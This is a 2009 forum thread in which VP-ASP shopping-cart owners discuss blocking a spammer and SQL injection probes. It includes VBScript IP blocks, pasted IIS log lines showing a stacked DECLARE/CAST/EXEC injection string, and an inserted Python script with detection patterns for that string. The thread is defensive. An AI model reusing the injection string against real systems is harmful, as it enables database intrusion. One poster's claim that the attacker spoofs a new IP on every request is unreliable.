cijeho
Starting Member
13 Posts
Posted - July 09 2009 : 10:00:39
Hi - there is a user from the Philippines that has been hitting one of my tellafriend pages repeatedly for the past couple of hours. Nonstop. Is there a way to block a URL from visiting my site? I have 4.5, am waiting for 7.0, and am a bit of a novice.
Edited by - cijeho on July 09 2009 15:01:45

THeVerve
VP-CART New User
117 Posts
Posted - July 09 2009 : 10:50:37
Do you know the IP address of the spammer? If you do, you can try adding this modification to your shoptellafriend.asp.
Open up shoptellafriend.asp using a text editor and add this code. Replace "xxxxxxx" with the IP address of the spammer.

    ' Reject the request outright when it comes from the blocked address
    If request.servervariables("REMOTE_ADDR") = "xxxxxxx" Then
        shoperror "An error has occurred. Please restart shopping."
    End If

Add the code under the code "initializesystem" (around line 37 or so).
The code will not work though if they keep changing their IP address using a proxy. The best way for this is probably to disable shoptellafriend.asp temporarily by renaming it to something else.

cijeho
Starting Member
13 Posts
Posted - July 09 2009 : 12:01:17
Thank you. I don't have the initializesystem in that file. Sorry. I did change the shoptellafriend.asp name to something else, so they now get a 404. Unfortunately, that hasn't stopped them. Any other ideas?

cijeho
Starting Member
13 Posts
Posted - July 09 2009 : 15:00:39
Help! This has been going on for 6 hours straight!

support
Administrator
4679 Posts
Posted - July 09 2009 : 15:06:43
Hi there
You may want to post this on our helpdesk if you cannot solve it from your end.
https://helpdesk.vpasp.com
Thanks
Cam VPASP Support

cijeho
Starting Member
13 Posts
Posted - July 09 2009 : 15:14:56
Thanks, Cam. What if I don't know my order ID?

support
Administrator
4679 Posts
Posted - July 09 2009 : 15:18:13
You should be able to see your order number at the bottom of your admin screen.
If it is not there, then when you post a ticket add your FTP details in the secure section and our support guys can have a look for you.
When registering in the helpdesk, select FREE as your version so you do not have to insert an order number if you cannot locate it.
Thanks, Cam
VPASP Support

SQLDude
Starting Member
41 Posts
Posted - November 10 2009 : 02:54:29
I put this code in to prevent what looks like a SQL injection attack, if that is what this is. Does anyone know how to determine the identity of the person who owns the IP address and ...umm give him whatever or report him to the authorities or return the favor to them?

    ' Reject the request outright when it comes from the address seen in the log below
    If request.servervariables("REMOTE_ADDR") = "93.158.148.30" Then
        shoperror "An error has occurred. Please restart shopping."
    End If

Yandex/1.01.001+(compatible;+Win16;+I) - 200 0 319 156 453
2009-11-09 12:57:44 W3SVC165 GET /shopexd.asp id=552&bc=no;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 173.18.135.53 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 46672 1547 2953
2009-11-09 12:57:45 W3SVC165 GET /shopexd.asp id=552&bc=no;DeclArE%20@S%20VArChaR(4000);sEt%20@S=CAst(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%20as%20varcHAR(4000));exeC(@S);-- 80 - 173.18.135.53 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 46614 1573 703
This year is my 10th Anniversary as a VPASP consultant. Suggestions made to Howard Kadetz which were adopted as part of the core VPASP system include the VeriSign Gateway which I actually debugged and validated, the Snitz Forums Application which you are using right now, and ChiliSoft ASP for MySQL and Linux. I have been developing both ASP, ASP.NET and SQL Server Applications for the same timeframe and my clients have included: United HealthCare, Bank of America, Sirius Satellite Radio, Sovereign Bank, Boston University Medical School, EMC Corp., TJMaxx Stores and several other Fortune 100 or Fortune 500 Companies.
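Added example, not code from the thread or from VP-ASP: a small Python triage script covering both THeVerve's per-IP block and SQLDude's log excerpt. It parses IIS W3C log records, URL-decodes the query, scores it against the DECLARE/CAST/EXEC/-- indicators from the excerpt regardless of letter case (the second probe varies case to dodge naive filters), and tallies offending client addresses for a block list keyed on the record's c-ip field rather than its User-Agent. The field order, sample records and addresses are constructed assumptions.

```python
"""Parse IIS W3C log records and flag SQL-injection probes against shopexd.asp."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log (not from the thread) in IIS W3C field order: date time s-sitename
# cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer)
# sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken.  Client addresses are
# RFC 5737 documentation ranges and the hex payload from the excerpt is elided as <BLOB>.
SAMPLE_LOG = """\
2009-11-09 12:57:40 W3SVC165 GET /shopexd.asp id=552 80 - 198.51.100.7 Mozilla/4.0+(compatible) - 200 0 319 156 453
2009-11-09 12:57:44 W3SVC165 GET /shopexd.asp id=552&bc=no;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(<BLOB>%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 203.0.113.53 Mozilla/4.0+(compatible;+MSIE+7.0) - 200 0 46672 1547 2953
2009-11-09 12:57:45 W3SVC165 GET /shopexd.asp id=552&bc=no;DeclArE%20@S%20VArChaR(4000);sEt%20@S=CAst(<BLOB>%20as%20varcHAR(4000));exeC(@S);-- 80 - 203.0.113.53 Mozilla/4.0+(compatible;+MSIE+7.0) - 200 0 46614 1573 703
"""

# Indicators taken from the payload shape in the thread, matched case-insensitively because
# the second probe varies letter case (DeclArE, CAst, exeC) to slip past naive filters.
INJECTION_PATTERNS = [
    re.compile(r";\s*declare\s+@\w+", re.I),  # stacked statement declaring a T-SQL variable
    re.compile(r"\bcast\s*\(", re.I),         # CAST(...) wrapping the encoded payload
    re.compile(r"\bexec\s*\(", re.I),         # EXEC(@S) running the decoded string
    re.compile(r"--\s*$"),                    # trailing comment discarding the rest of the query
]

def parse_record(line):
    """Fields triage needs from one W3C record (query URL-decoded); None for comment/short lines."""
    f = line.split(" ")
    if line.startswith("#") or len(f) < 12:
        return None
    return {"time": f"{f[0]} {f[1]}", "stem": f[4], "ip": f[8], "status": f[11],
            "query": unquote_plus(f[5]), "user_agent": f[9].replace("+", " ")}

def injection_score(query):
    """Number of distinct indicators present in an already URL-decoded query string."""
    return sum(1 for p in INJECTION_PATTERNS if p.search(query))

def find_injection_attempts(log_text, threshold=2):
    """Records whose query hits at least `threshold` indicators (2 avoids flagging a lone '--')."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec and injection_score(rec["query"]) >= threshold:
            hits.append(rec)
    return hits

def ips_to_block(hits):
    """Attempts per client address, keyed on the c-ip of the offending record rather than its UA."""
    return Counter(rec["ip"] for rec in hits)
```

Calling find_injection_attempts(SAMPLE_LOG) returns the two probe records, both attributed by ips_to_block to 203.0.113.53, while the benign first record scores zero.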

devshb
Senior Member
United Kingdom
1904 Posts
Posted - November 10 2009 : 03:47:22
"report him to the authorities"
If you do that, I wish you the best of luck! Whenever I've tried to report hackers (even ones who were in the process of committing massive multi-million dollar credit card fraud and who I knew lots of info about), the authorities didn't want to know. Might be different in other countries, but here in the UK the authorities simply aren't interested in electronic fraud (at least that's what I've found, maybe others have had more luck).
I gave up reporting fraud/hackers in the end; every time I reported it I was either ignored completely or told that I needed to have official proof of the actual physical theft before they'd even look at it. I.e. they'd only investigate if the person defrauded reported the crime; they wouldn't even consider situations where you knew what was going on but weren't personally the affected customer.
Simon Barnaby Developer [email protected] www.BigYellowZone.com Web Design, Online Marketing and VPASP addons
Edited by - devshb on November 10 2009 03:49:49

SQLDude
Starting Member
41 Posts
Posted - November 11 2009 : 10:08:09
The subtle sub-rosa intent was to inform others to search for a User_Agent which contains "Yandex" in order to block all breach attempts from persons with accounts at:
http://www.Yandex.ru
The user_agent setting has the telltale browser setting from that website as an ISP even though the person spoofs random IP addresses. I have some ASP code which does a quick reverse DNS lookup to source the country of origin if they use their correct IP address. If you never sell into Russia, Iran, Afghanistan or Iraq then you might want to block all IPs from those countries.
I will post the download area for this code in a few hours if anyone is interested. It uses an Access Database.

SQLDude
Starting Member
41 Posts
Posted - November 11 2009 : 10:43:29
Here is the IP to Country translation URL for testing purposes:
http://designerstyles.biz/ip/ipcountry.asp
This can not only be used to block certain countries which are known hacker havens, but also to provide a first line of defense against possible credit card fraud. If the country where the IP Address originates from does not match the Country on the Credit Card, you can expend additional validation time to convince yourself whether or not the Credit Card is perhaps being used by a credit card fraud expert.
I will add this as a product item on my website later today.
eMail me if you are interested: [email protected]

janetvelasquez80l
Starting Member
1 Posts
Posted - November 13 2009 : 10:24:50
Have you tried blocking its IP?

SQLDude
Starting Member
41 Posts
Posted - November 13 2009 : 14:07:43
This hacker using Yandex as the ISP is so sophisticated that he can spoof normal US IP addresses and change it every time. The one thing he can't change is the embedded reference to "Yandex" in his User Agent settings, so that is what I search for and then block out based on that setting. You have to counter the sophisticated hacker attacks with appropriate counter-measures. Since I cannot ship out of the USA without many complex tariff and customs written documentation, I may just block out all non-USA IP addresses using the list of 60,000 rules for assigned IP ranges found in my IP to Country conversion routines.
http://designerstyles.biz/ip/ipcountry.asp
I plan to convert this into a mini-product which will sell for $79.00 if anyone is interested.

highbanks
Starting Member
2 Posts
Posted - November 23 2009 : 20:19:04
Back to the original question, I too have seen a lot of possible shoptellafriend.asp attacks. What is the issue with that file? And is it fixed in ver 6.5? I am doing an upgrade now.

highbanks
Starting Member
2 Posts
Posted - November 23 2009 : 20:20:16
Oh, forgot... does 6.5 have the ability to block certain countries?

SQLDude
Starting Member
41 Posts
Posted - November 23 2009 : 20:39:51
All better now. Cam and company added a Captcha feature which makes it impossible for a remote robot submission to succeed. You have to view and enter a 100% match to the 5-10 jumbled and obfuscated characters before doing a submit. And they also added a clearchars feature which strips out most if not all of the SQL injection attacks like the one I posted above.
The more I have to dig into the original source code for the enhancements I did for both the Google Checkout processing and for Bing Cash Back processing written mostly by Howard Kadetz and then modified by Cam and Company, the more impressed I am with what they have accomplished. My hat is off to you, Howard and Cam. Howard you are one of the true pioneers in the field of ASP Shopping Cart software written with a truly generic but very sophisticated approach which allows the SAME CODEBASE to work for Access, MySQL or SQL Server while still accommodating features from Chili Soft to allow systems to run on Linux or Windows. And the number of International Gateways you guys have to support is amazing, just amazing.
I am sure it was a 10-year labor of love for Howard, but at the same time it must have been very, very frustrating to make sure that every line of code would work under each and every combination and permutation of operating systems, database back-ends and gateways.
But enough about Howard and Cam, let's talk about me. I have been told by both Google Checkout management and Bing Cashback personnel that I am the first person they ever heard of who has enabled BOTH integrated systems and all the features in a 100% integrated fashion without dropping a cookie, trashing a session, missing a byte, losing an order number or an order item, or losing a persisted Bing Session Variable, even while making multiple round trips to the remote Google hosted servers.
Then when I told them that I did the whole thing with FULL cookie and session integration in less than 18 days flat they were even more impressed. I have purchased several domains like ShopBingCarts.com, Googlized.net and Bingified.com, or whatever, and will be launching marketing campaigns after the holiday selling seasons. Delusions of Grandeur you say? Could be, but it ain't bragging if you can do it.
If you have a domestic USA shopping cart and are interested, drop me an email and I can walk you through my web site as soon as it is 100% certified by Bing Cash Back and it is launched. Target date is the first few days in December. Bing also has a pilot for Bing Search Shopping which I hope to be selected for as well.
John, the SQL Dude [email protected]